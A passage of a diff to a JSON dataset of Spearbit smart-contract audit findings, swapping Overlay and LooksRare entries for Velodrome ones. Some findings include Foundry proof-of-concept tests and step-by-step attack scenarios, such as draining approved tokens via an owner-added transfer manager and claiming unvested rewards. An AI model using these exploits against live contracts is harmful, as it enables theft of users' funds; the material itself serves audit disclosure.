ONE - fundingFactor.powDown(2 * ONE) ); ... }", + "title": "Discrepancies between specification and implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Instance 1 - Zapping The specification mentioned that it supports zapping into a pool from any token. Following is the extract Swapping and lp depositing/withdrawing of fee-on-transfer tokens. Zapping in and out of a pool from any token (i.e. A->(B,C) or (B,C) -> A). A can be the same as B or C. Zapping and staking into a pool from any token. 60 However, the zapIn and zapOut functions utilize the internal _swap function that does not support fee-on-transfer tokens.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Retrieve roles via constants in import", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Within contract OverlayV1Factory.sol, the roles GOVERNOR_ROLE, MINTER_ROLE, BURNER_ROLE are retrieved via an external function call. To save gas they could also be retrieved as constants via import. Additionally, a role ADMIN_ROLE is defined in contract OverlayV1Token.sol, which is the same as DEFAULT_ADMIN_- ROLE of AccessControl.sol. This ADMIN_ROLE could be replaced with DEFAULT_ADMIN_ROLE. modifier onlyGovernor() { - + require(ovl.hasRole(ovl.GOVERNOR_ROLE(), msg.sender), \"OVLV1: !governor\"); require(ovl.hasRole(GOVERNOR_ROLE, msg.sender), \"OVLV1: !governor\"); _; } ... function deployMarket(...) { ... ovl.grantRole(ovl.MINTER_ROLE(), market_); ovl.grantRole(MINTER_ROLE, market_); ovl.grantRole(ovl.BURNER_ROLE(), market_); ovl.grantRole(BURNER_ROLE, market_); ... - + - + }", + "title": "Early exit for withdrawManaged function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "VotingEscrow.withdrawManaged function.", "labels": [ "Spearbit", - "Overlay", - "Severity: Gas Optimization" + "Velodrome", + "Severity: Informational" ] }, { - "title": "Double check action when snapAccumulator == 0 in transform()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function transform() does a check for snapAccumulator + value == 0 (where all variables are of type int256). This could be true if value == -snapAccumulator (or snapAccumulator == value == 0) A comment shows this is to prevent division by 0 later on. The division is based on abs(snapAccumulator) + abs(value). So this will only fail when snapAccumulator == value == 0. function transform(...) ... { ... int256 accumulatorNow = snapAccumulator + value; if (accumulatorNow == 0) { // if accumulator now is zero, windowNow is simply window // to avoid 0/0 case below return ... ---> this comment might not be accurate } ... uint256 w1 = uint256(snapAccumulator >= 0 ? snapAccumulator : -snapAccumulator); // w1 = abs(snapAccumulator) uint256 w2 = uint256(value >= 0 ? value : -value); uint256 windowNow = (w1 * (snapWindow - dt) + w2 * window) / (w1 + w2); // only fails if w1 == w2 == 0 ... // w2 = abs(value) ,! ,! }", + "title": "DOS attack at future facilitator contract and stop SinkManager.convertVe", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "As noted in \"DOS attack by delegating tokens at MAX_DELEGATES = 1024\", the old votingEscrow has a gas concern, i.e., the gas cost of transfer/ burn will increase when an address holds multiple NFT tokens. The concern becomes more serious when the protocol is deployed on Optimism, where the gas limit is smaller than other L2 chains. If an address is being attacked and holds max NFT tokens (1024), the user can not withdraw funds due to the gas limit. To mitigate the potential DOS attack where the attack DOS the v1's votingEscrow and stop sinkManager from re- ceiving tokens, the sinkManager utilize a facilitator contract. When the sinkManager needs to receive the votingE- scrow NFT, it creates a new contract specifically for this purpose. Since the contract is newly created, it does not contain any tokens, making it more gas-efficient to receive the token through the facilitator contract. However, the attacker can DOS attack the contract by sending NFT tokens to a future facilitator. salted-contract-creations-create2 When creating a contract, the address of the contract is computed from the address of the creating contract and a counter that is increased with each contract creation. The exploit scenario would be: At the time the sinkManager is deployed and zero facilitator is created. The attacker can calculate the address of all future facilitators by computing sha3(rlp.encode([normalize_address(sender), nonce]))[12:] The attacker can compute the 10-th facilitator's address and sends 1024 NFT tokens to the ad- dress. The sinkManager will function normally nine times. Though, when the 10th user wants to convert the token, the sinkManager deployed the 10th facilitator address. Since the 10th facilitator already has 1024 NFT positions, it can not receive any tokens. The transaction will revert and the sinkManager will be stuck in the current state.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Add unchecked in natural log (ln) function or remove the functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function ln() in contract LogExpMath.sol does not use unchecked, while the function log() does. Note: Neither ln() nor log() are used, so they could also be deleted. function log(int256 arg, int256 base) internal pure returns (int256) { unchecked { ... } } function ln(int256 a) internal pure returns (int256) { // no unchecked }", + "title": "RewardDistributor caching totalSupply leading to incorrect reward calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "RewardDistributor distributes newly minted VELO tokens to users who locks the tokens in VotingEscrow. Since the calculation of past supply is costly, the rewardDistributor cache the supply value in uint256[1000000000000000] public veSupply. The RewardDistributor._checkpointTotalSupply function would iterate from the last updated time util the latest epoch time, fetches totalSupply from votingEscrow, and store it. Assume the following scenario when a transaction is executed at the beginning of an epoch. 1. The totalSupply is X. 2. The user calls checkpointTotalSupply. The rewardDistributor save the totalSupply = X. 3. The user creates a lock with 2X the amount of tokens. The user has balance = 2X and the totalSupply becomes 3X. 4. Fast forward to when the reward is distributed. The user claims the tokens, reward is calculated by total reward * balance / supply and user gets 2x of the total rewards.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: High Risk" ] }, { - "title": "Specialized functions for the long and short side", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The functions build(), unwind() and liquidate() contain a large percentage of code that is differ- ent for the long and short side.", + "title": "Lack of slippage control during compounding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "When swapping the reward tokens to VELO tokens during compounding, the slippage control is disabled by configuring the amountOutMin to zero. This can potentially expose the swap/trade to sandwich attacks and MEV (Miner Extractable Value) attacks, resulting in a suboptimal amount of VELO tokens received from the swap/trade. router.swapExactTokensForTokens( balance, 0, // amountOutMin routes, address(this), block.timestamp );", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Beware of chain dependencies", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The contracts have a few dependencies/assumptions which arent future proof and/or limit on which chain the code can be deployed. The AVERAGE_BLOCK_TIME is different on several EVM based chains. As the the Ethereum mainchain, the AVER- AGE_BLOCK_TIME will change to 12 seconds after the merge. contract OverlayV1Market is IOverlayV1Market { ... uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof ... } WETH addresses are not the same on different chains. See Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH. 21 contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; ... }", + "title": "ALLOWED_CALLER can steal all rewards from AutoCompounder using a fake factory in the route.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "AutoCompounder allows address with ALLOWED_CALLER role to trigger swapTokenToVELOAndCompound. The function sells the specified tokens to VELO. Since the Velo router supports multiple factories. An attacker can deploy a fake factory with a backdoor. By routing the swaps through the backdoor factory the attacker can steal all reward tokens in the AutoCompounder contract.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Move _registerMint() closer to mint() and burn()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Within functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However these two are quite a few lines apart so it is not immediately obvious they are related and operate on the same values. Additionally _registerMint() also registers burns. function unwind(...) ... { ... _registerMint(int256(value) - int256(cost)); ... // 40 lines of code if (value >= cost) { ovl.mint(address(this), value - cost); } else { ovl.burn(cost - value); } ... } function liquidate(address owner, uint256 positionId) external { ... _registerMint(int256(value) - int256(cost)); ... // 33 lines of code ovl.burn(cost - value); ... }", + "title": "depositManaged can be used by locks to receive unvested VELO rebase rewards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Velo offer rebase emissions to all Lockers. These are meant to be depositFor into an existing lock, and directly transferred if the lock just expired. The check is the following: if (_timestamp > _locked.end && !_locked.isPermanent) { By calling depositManaged we can get the check to pass for a Lock that is not expired, allowing us to receive Unvested Velo (we could sell unfairly for example). Due to how depositManaged and withdrawManaged work, the attacker would be able to perform this every other week (1 week cooldown, 1 week execution). Because of how the fact that managedRewards are delayed by a week the attacker will not lose any noticeable amount of rewards, meaning that most users would rationally opt-into performing this operation to gain an unfair advantage, or to sell their rewards each week while other Lockers are unable or unwilling to perform this operation. The following POC will show an increase in VELO balance for the tokenId2 owner in spite of the fact that the lock is not expired Logs: Epoch 1 Token Locked after Token2 Locked after User Bal after 56039811453980167852 -1000000000000000000000000 // Negative because we have `depositManaged` 56039811453980167852 // We received the token directly, unvested function testInstantClaimViaManaged() public { // Proof that if we depositManaged, we can get our rebase rewards instantly // Instead of having to vest them via the lock skipToNextEpoch(1 days); minter.updatePeriod(); console2.log(\"Epoch 1\"); VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, MAXTIME); uint256 mTokenId = escrow.createManagedLockFor(address(this)); skipToNextEpoch(1 hours + 1); minter.updatePeriod(); 65 skipToNextEpoch(1 hours + 1); minter.updatePeriod(); // Now we claim for 1, showing that they incease locked int128 initialToken1 = escrow.locked(tokenId).amount; distributor.claim(tokenId); // Claimed from previous epoch console2.log(\"Token Locked after \", escrow.locked(tokenId).amount - initialToken1); // For 2, we deposit managed, then claim, showing we get tokens unlocked uint256 initialBal = VELO.balanceOf(address(this)); int128 initialToken2 = escrow.locked(tokenId2).amount; voter.depositManaged(tokenId2, mTokenId); distributor.claim(tokenId2); // Claimed from previous epoch console2.log(\"Token2 Locked after \", escrow.locked(tokenId2).amount - initialToken2); console2.log(\"User Bal after \", VELO.balanceOf(address(this)) - initialBal); }", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Medium Risk" ] }, { - "title": "Use of Math.min() is error-prone", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Function Math.min() is used in two ways: To get the smallest of two values, e.g. x = Math.min(x,y); To make sure the resulting value is >=0, e.g. x -= Math.min(x,y); (note, there is an extra - in -= ) It is easy to make a mistake because both constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values: OverlayV1Market.sol: tradingFee OverlayV1Market.sol: cap OverlayV1Market.sol: cap = Math.min(tradingFee, value); = Math.min(cap, circuitBreaker(snapshot, cap)); = Math.min(cap, backRunBound(data)); Examples to make sure the resulting value is >=0: OverlayV1Market.sol: oiLong -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares OverlayV1Market.sol: pos.notional OverlayV1Market.sol: pos.debt OverlayV1Market.sol: pos.oiShares OverlayV1Market.sol: oiLong oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiLongShares OverlayV1Market.sol: oiShort oiTotalSharesOnSide)); ,! OverlayV1Market.sol: oiShortShares Position.sol: posCost -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= uint120( Math.min(pos.notional, pos.notionalInitial(fraction))); -= uint120( Math.min(pos.debt, pos.debtCurrent(fraction))); -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= Math.min(posCost, posDebt);", + "title": "Unnecessary slippage loss due to AutoCompounder selling VELO", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "AutoCompounder allows every address to help claim the rewards and compound to the locked VELO position. The AutoCompounder will sell _tokensToSwap into VELO. By setting VELO as _tokensToSwap, the AutoCom- pounder would do unnecessary swaps that lead to unnecessary slippage loss.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Confusing use of term burn", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "The function oiAfterFunding() contains a comment that it burns a portion of the contracts. The term burn can be confused with burning of OVL. The Overlay team clarified that: The total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding. Theres no actual burning of OVL. function oiAfterFunding(...) ... { ... // Burn portion of all aggregate contracts (i.e. oiLong + oiShort) // to compensate protocol for pro-rata share of imbalance liability ... return (oiOverweightNow, oiUnderweightNow); }", + "title": "epochVoteStart function calls the wrong library method", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The epochVoteStart function calls the VelodromeTimeLibrary.epochStart function instead of the VelodromeTimeLibrary.epochVoteStart function. Thus, the Voter.epochVoteStart function returns a voting start time without factoring in the one-hour distribution window, which might cause issues for users and developers relying on this information.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Document precondition for oiAfterFunding()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Function oiAfterFunding contains the following statement: uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; Nevertheless, if oiOverweightBefore < oiUnderweightBefore then statement will revert. Luckily, the update() function makes sure this isnt the case. function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... { ... uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // Could if oiOverweightBefore < oiUnderweightBefore ... } function update() public returns (Oracle.Data memory) { ... bool isLongOverweight = oiLong > oiShort; uint256 oiOverweight two uint256 oiUnderweight = isLongOverweight ? oiShort : the two (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...); ... = isLongOverweight ? oiLong : oiShort; // oiOverweight is the largest of the oiLong; // oiUnderweight is the smallest of ,! ,! }", + "title": "Managed NFT can vote more than once per epoch under certain circumstances", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The owner of the managed NFT could break the invariant that an NFT can only vote once per epoch Assume Bob owns the following two (2) managed NFTs: Managed veNFT (called mNFTa) with one (1) locked NFT (called lNFTa) Managed veNFT (called mNFTb) with one (1) locked NFT (called lNFTb) The balance of lNFTa and lNFTb is the same Bob voted on poolx with mNFTa and mNFTb on the first hour of the epoch At the last two hours of the voting windows of the current epoch, Bob changed his mind and decided to vote on the pooly . Under normal circumstances, the onlyNewEpoch modifier will prevent mNFTa and mNFTb from triggering the Voter.vote function because these two veNFTs have already voted in the current epoch and their lastVoted is set to a timestamp within the current epoch. However, it is possible for Bob to bypass this control. Bob could call Voter.withdrawManaged function to withdraw lNFTa and lNFTb from mNFTa and mNFTb respectively. Since the weight becomes zero, the lastVoted for both mNFTa and mNFTb will be cleared. As a result, they will be allowed to re-vote in the current epoch. Bob will call Voter.depositManaged to deposit lNFTb into mNFTa and lNFTa into mNFTb respectively to increase the weight of the managed NFTs. Bob then calls Voter.vote with mNFTa and mNFTb to vote on pooly . Since the lastVoted is empty (cleared earlier), the onlyNewEpoch modifier will not revert the transaction. Understood that the team that without clearing the lastVoted, it would lead to another potential issue where a new managed NFT could potentially be made useless temporarily for an epoch. Given the managed NFT grant significant power to the owner, the team intended to restrict access to the managed NFTs and manage abuse by utilizing the emergency council/governor to deactivate non-compliant managed NFTs, thus mitigating the risks of this issue.", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Format numbers intelligibly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", - "body": "Solidity offers several possibilities to format numbers in a more readable way as noted below.", + "title": "Invalid route is returned if token does not have a trading pool", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Assume that someone called the getOptimalTokenToVeloRoute function with a token called T that does not have a trading pool within Velodrome. While looping through all the ten (two) routes pre-defined in the constructor at Line 94 below, since the trading pool with T does not exist, it will keep skipping to the next route until the loop ends. As such, the index remains uninitialized at the end, meaning it holds the default value of zero. In Lines 110 to 112, it will conclude that the optimal route is as follows: routes[0] = routesTokenToVelo[index][0] = routesTokenToVelo[0][0] = address(0) <> USDC routes[1] = routesTokenToVelo[index][1] = routesTokenToVelo[0][1] = USDC <> VELO routes[0].from = token = T routes = T <> USDC <> VELO As a result, the getOptimalTokenToVeloRoute function returns an invalid route. function getOptimalTokenToVeloRoute( address token, uint256 amountIn ) external view returns (IRouter.Route[] memory) { // Get best route from multi-route paths uint256 index; uint256 optimalAmountOut; IRouter.Route[] memory routes = new IRouter.Route[](2); uint256[] memory amountsOut; // loop through multi-route paths for (uint256 i = 0; i < 10; i++) { routes[0] = routesTokenToVelo[i][0]; // Go to next route if a trading pool does not exist if (IPoolFactory(routes[0].factory).getPair(token, routes[0].to, routes[0].stable) == address(0)) continue; ,! routes[1] = routesTokenToVelo[i][1]; // Set the from token as storage does not have an address set routes[0].from = token; amountsOut = router.getAmountsOut(amountIn, routes); // amountOut is in the third index - 0 is amountIn and 1 is the first route output uint256 amountOut = amountsOut[2]; if (amountOut > optimalAmountOut) { // store the index and amount of the optimal amount out optimalAmountOut = amountOut; index = i; } } // use the optimal route determined from the loop routes[0] = routesTokenToVelo[index][0]; routes[1] = routesTokenToVelo[index][1]; routes[0].from = token; // Get amountOut from a direct route to VELO IRouter.Route[] memory route = new IRouter.Route[](1); 68 route[0] = IRouter.Route(token, velo, false, factory); amountsOut = router.getAmountsOut(amountIn, route); // compare output and return the best result return amountsOut[1] > optimalAmountOut ? route : routes; }", "labels": [ "Spearbit", - "Overlay", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "The Protocol owner can drain users' currency tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The Protocol owner can drain users' currency tokens that have been approved to the protocol. Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAs- setType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate. // file: test/foundry/Attack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; contract NullStrategy is IBaseStrategy { function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function executeNull( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external pure returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) {} } 5 contract AttackTest is ProtocolBase { NullStrategy private nullStrategy; MockERC20 private mockERC20; uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); looksRareProtocol.initiateOwnershipTransfer(signingOwner); // This particular strategy is not a requirement of the exploit. nullStrategy = new NullStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy) ); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); vm.stopPrank(); vm.prank(signingOwner); looksRareProtocol.confirmOwnershipTransfer(); } function testDrain() public { vm.prank(victimUser); mockERC20.approve(address(looksRareProtocol), 1000); vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(mockERC20), mockERC20.transferFrom.selector ); OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({ // null strategy askNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // ERC20 asset! orderNonce: 0, collection: victimUser, // <--- will be used as the `from` currency: address(0), signer: signingOwner, minPrice: 0, itemId: 1 }); 6 bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK); OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid( address(1000), // `amount` field for the `transferFrom` 0, makerAsk.itemIds, makerAsk.amounts, bytes(\"\") ); looksRareProtocol.executeTakerBid( takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); vm.stopPrank(); assertEq(mockERC20.balanceOf(signingOwner), 1000); assertEq(mockERC20.balanceOf(victimUser), 0); } }", + "title": "SafeApprove is not used in AutoCompounder", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "safeApprove is not used in AutoCompounder. Tokens that do not follow standard ERC20 will be locked in the contract.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "StrategyFloorFromChainlink will often revert due to stale prices", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updateAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may have not been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an eth premium from the floor, in the likely scenario where the taker didn't log-in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make.", + "title": "balanceOfNFT can be made to return non-zero value via split and merge", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Ownership Change Sidestep via Split. Splitting allows to change the ID, and have it work. This allows to sidestep this check in VotingEscrow.sol#L1052-L1055 Meaning you can always have a non-zero balance although it requires performing some work. This could be used by integrators as a way to accurately track their own voting power.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Medium Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "1. When a maker or taker sets a minPrice for an ask, the protocol should guarantee the funds they receive is at minimum the minPrice amount (currently not enforced). 2. Also reversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1. the current protocol-controlled deviation can be 30% maximum (sum of fees sent to the creator, the protocol fee recipient, and an affiliate).", + "title": "delegateBySig can use malleable signatures", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because the function delegateBySig uses ecrecover and doesn't check for the value of the sig- nature, other signatures, that have higher numerical values, which map to the same signature, could be used. Because the code uses nonces only one signature could be used per nonce.", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "StrategyItemIdsRange does not invalidate makerBid.amounts[0] == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyItemIdsRange does not check whether makerBid.amounts[0] is zero or not. If it was 0, the taker can provide empty itemIds and amounts which will cause the for loop to be skipped. The check below will also be successful since both amounts are 0: if (totalOfferedAmount != desiredAmount) { revert OrderInvalid(); } Depending on the used implementation of a transfer manager for the asset type used in this order, we might end up with the taker taking funds from the maker without providing any NFT tokens. The current implementation of TransferManager does check whether the provided itemIds have length 0 and it would revert in that case. One difference between this strategy and others are that all strategies including this one do check to revert if an amount for a specific itemId is 0 (and some of them have loops but the length of those loops depends on the parameters from the maker which enforce the loop to run at least once), but for this strategy if no itemIds are provided by the taker, the loop is skipped and one does not check whether the aggregated amount is 0 or not.", + "title": "Slightly Reduced Voting Power due to Rounding Error", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because of rounding errors, a fully locked NFT will incur a slight loss of Vote Weight (around 27 BPS). [PASS] testCompareYieldOne() (gas: 4245851) Logs: distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 block.timsestamp 1814399 block.timsestamp 1900800 Epoch 2 distributor.claimable(tokenId) 0 locked.amount 1000000000000000000000000 escrow.userPointHistory(tokenId, 1) 0 escrow.userPointHistory(tokenId, 1) 1814399 escrow.userPointHistory(tokenId, 1) BIAS 997260281900050656907546 escrow.userPointHistory(tokenId, tokenId2) 1814399 escrow.userPointHistory(tokenId, tokenId2) BIAS 997260281900050656907546 userPoint.ts 1814399 getCursorTs(tokenId) 1814400 userPoint.ts 1814399 epochStart(tokenId) 1814400 70 userPoint.ts 1814399 ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1) 997260281900050656907546 function getCursorTs(uint256 tokenId) internal returns(uint256) { IVotingEscrow.UserPoint memory userPoint = escrow.userPointHistory(tokenId, 1); console2.log(\"userPoint.ts\", userPoint.ts); uint256 weekCursor = ((userPoint.ts + WEEK - 1) / WEEK) * WEEK; uint256 weekCursorStart = weekCursor; return weekCursorStart; } function epochStart(uint256 timestamp) internal pure returns (uint256) { unchecked { return timestamp - (timestamp % WEEK); } } function testCompareYieldOne() public { skipToNextEpoch(1 days); // Epoch 1 skipToNextEpoch(-1); // last second VELO.approve(address(escrow), TOKEN_1M * 2); uint256 tokenId = escrow.createLock(TOKEN_1M, MAXTIME); uint256 tokenId2 = escrow.createLock(TOKEN_1M, 4 * 365 * 86400); uint256 mTokenId = escrow.createManagedLockFor(address(this)); console2.log(\"distributor.claimable(tokenId)\", distributor.claimable(tokenId)); console2.log(\"locked.amount\", escrow.locked(tokenId).amount); console2.log(\"block.timsestamp\", block.timestamp); minter.updatePeriod(); // Update for 1 skipToNextEpoch(1 days); // Go next epoch minter.updatePeriod(); // and update 2 console2.log(\"block.timsestamp\", block.timestamp); console2.log(\"Epoch 2\"); //@audit here we have claimable for tokenId and mTokenId IVotingEscrow.LockedBalance memory locked = escrow.locked(tokenId); console2.log(\"distributor.claimable(tokenId)\", distributor.claimable(tokenId)); console2.log(\"locked.amount\", escrow.locked(tokenId).amount); console2.log(\"escrow.userPointHistory(tokenId, 1)\", escrow.userPointHistory(tokenId, 0).ts); console2.log(\"escrow.userPointHistory(tokenId, 1)\", escrow.userPointHistory(tokenId, 1).ts); console2.log(\"escrow.userPointHistory(tokenId, 1) BIAS\", escrow.userPointHistory(tokenId, 1).bias); ,! console2.log(\"escrow.userPointHistory(tokenId, tokenId2)\", escrow.userPointHistory(tokenId2, 1).ts); ,! console2.log(\"escrow.userPointHistory(tokenId, tokenId2) BIAS\", ,! escrow.userPointHistory(tokenId2, 1).bias); console2.log(\"getCursorTs(tokenId)\", getCursorTs(tokenId)); console2.log(\"epochStart(tokenId)\", epochStart(getCursorTs(tokenId))); console2.log(\"ve.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)\", ,! escrow.balanceOfNFTAt(tokenId, getCursorTs(tokenId) - 1)); } 71", "labels": [ "Spearbit", - "LooksRare", + "Velodrome", "Severity: Low Risk" ] }, { - "title": "TransferManager's owner can block token transfers for LooksRareProtocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In general, a deployed TransferManager ( T ) and a deployed LooksRareProtocol ( L ) might have two different owners ( OT , OL ). Assume TransferManager is used for asset types 0 and 1 (ERC721, ERC1155) in LooksRareProtocol and 